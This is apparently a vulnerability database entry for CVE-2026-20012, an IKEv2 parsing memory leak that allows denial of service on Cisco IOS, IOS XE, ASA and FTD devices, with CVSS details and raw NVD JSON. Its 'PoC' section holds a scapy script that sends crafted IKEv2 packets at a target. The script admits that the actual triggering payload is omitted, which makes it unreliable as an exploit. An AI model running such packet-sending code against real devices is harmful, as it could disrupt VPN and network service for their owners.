Security Vulnerability Report
CVE-2026-20012 CVSS 8.6 HIGH

CVE-2026-20012

Published: 2026-03-25 16:16:11
Last Modified: 2026-03-26 15:13:34

Description

A vulnerability in the Internet Key Exchange version 2 (IKEv2) feature of Cisco IOS Software, Cisco IOS XE Software, Cisco Secure Firewall Adaptive Security Appliance (ASA) Software, and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to trigger a memory leak, resulting in a denial of service (DoS) condition on an affected device. This vulnerability is due to improper parsing of IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device. A successful exploit of Cisco IOS Software and IOS XE Software could allow the attacker to cause the affected device to reload, resulting in a DoS condition. A successful exploit of Cisco Secure Firewall ASA Software and Secure FTD Software could allow the attacker to partially exhaust system memory, resulting in system instability, such as the inability to establish new IKEv2 VPN sessions. A manual reboot of the device is required to recover from this condition.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

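Cisco IOS Software (for the specific affected versions, refer to the official Cisco advisory)
Cisco IOS XE Software (for the specific affected versions, refer to the official Cisco advisory)
Cisco Secure Firewall ASA Software (for the specific affected versions, refer to the official Cisco advisory)
Cisco Secure Firewall Threat Defense (FTD) Software (for the specific affected versions, refer to the official Cisco advisory)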

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import time

from scapy.all import IP, UDP, Raw, RandString, send
# The IKEv2 layer lives in scapy.contrib, not in scapy.all
from scapy.contrib.ikev2 import IKEv2

# Target IP address of the vulnerable device
target_ip = "192.168.1.1"


# IKEv2 SA (Security Association) Initiator Packet
# This is a conceptual PoC. The specific payload structure
# that triggers the memory leak is proprietary to the vendor
# and has been omitted for safety reasons.
def craft_malicious_ikev2_packet():
    # Constructing a basic IKEv2 packet header
    # Initiator SPI and Responder SPI are usually random
    # (scapy names the message ID field "id")
    ike_hdr = IKEv2(init_SPI=RandString(8), resp_SPI=RandString(8),
                    next_payload='None', exch_type='IKE_SA_INIT',
                    flags='Initiator', id=0)

    # Malformed payload that triggers parsing error/leak
    # In a real exploit scenario, specific payload lengths or types are used
    malformed_payload = Raw(b"\x00" * 100)

    packet = IP(dst=target_ip)/UDP(dport=500, sport=500)/ike_hdr/malformed_payload
    return packet


if __name__ == "__main__":
    print(f"[*] Sending crafted IKEv2 packets to {target_ip}...")
    # Sending multiple packets to trigger the memory leak
    for i in range(100):
        pkt = craft_malicious_ikev2_packet()
        send(pkt, verbose=0)
        time.sleep(0.1)
    print("[*] Attack packets sent.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20012", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:10.957", "lastModified": "2026-03-26T15:13:33.940", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Internet Key Exchange version 2 (IKEv2) feature of Cisco IOS Software, Cisco IOS XE Software, Cisco Secure Firewall Adaptive Security Appliance (ASA) Software, and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to trigger a memory leak, resulting in a denial of service (DoS) condition on an affected device.\r\n\r This vulnerability is due to improper parsing of IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device. A successful exploit of Cisco IOS Software and IOS XE Software could allow the attacker to cause the affected device to reload, resulting in a DoS condition. A successful exploit of Cisco Secure Firewall ASA Software and Secure FTD Software could allow the attacker to partially exhaust system memory, resulting in system instability, such as the inability to establish new IKEv2 VPN sessions. A manual reboot of the device is required to recover from this condition."}, {"lang": "es", "value": "Una vulnerabilidad en la función de Intercambio de Claves de Internet versión 2 (IKEv2) de Cisco IOS Software, Cisco IOS XE Software, Cisco Secure Firewall Adaptive Security Appliance (ASA) Software y Cisco Secure Firewall Threat Defense (FTD) Software podría permitir a un atacante remoto no autenticado activar una fuga de memoria, lo que resultaría en una condición de denegación de servicio (DoS) en un dispositivo afectado.\nEsta vulnerabilidad se debe a un análisis incorrecto de los paquetes IKEv2. Un atacante podría explotar esta vulnerabilidad enviando paquetes IKEv2 manipulados a un dispositivo afectado. 
Un exploit exitoso de Cisco IOS Software y IOS XE Software podría permitir al atacante provocar que el dispositivo afectado se reinicie, lo que resultaría en una condición de DoS. Un exploit exitoso de Cisco Secure Firewall ASA Software y Secure FTD Software podría permitir al atacante agotar parcialmente la memoria del sistema, lo que resultaría en inestabilidad del sistema, como la incapacidad de establecer nuevas sesiones VPN IKEv2. Se requiere un reinicio manual del dispositivo para recuperarse de esta condición."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-ios-dos-kPEpQGGK", "source": "[email protected]"}]}}